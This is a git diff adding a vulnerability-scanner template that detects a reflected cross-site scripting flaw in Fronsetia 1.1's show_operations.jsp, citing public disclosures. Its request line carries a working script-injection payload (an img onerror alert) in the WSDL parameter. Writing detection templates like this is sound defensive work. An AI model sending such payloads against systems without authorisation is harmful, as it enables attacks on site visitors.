diff --git a/http/vulnerabilities/fronsetiav-xss.yaml b/http/vulnerabilities/fronsetiav-xss.yaml
new file mode 100644
index 00000000000..7a90e1cdfd6
--- /dev/null
+++ b/http/vulnerabilities/fronsetiav-xss.yaml
@@ -0,0 +1,28 @@
+id: fronsetiav-xss
+
+info:
+  name: fronsetiav1.1 - Cross-Site Scripting
+  author: s4e-io
+  severity: high
+  description: |
+    The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
+  reference:
+    - https://seclists.org/fulldisclosure/2024/Nov/10
+    - https://packetstormsecurity.com/files/182764/fronsetia-1.1-Cross-Site-Scripting.html
+    - https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html
+  metadata:
+    vendor: fronsetiav1.1
+    product: fronsetiav1.1
+  tags: xss,fronsetiav1,seclists,packetstorm
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<title> Fronsetia: \"><img src=x onerror=alert(document.domain)> </title>")'
+          - 'status_code == 200'
+        condition: and
\ No newline at end of file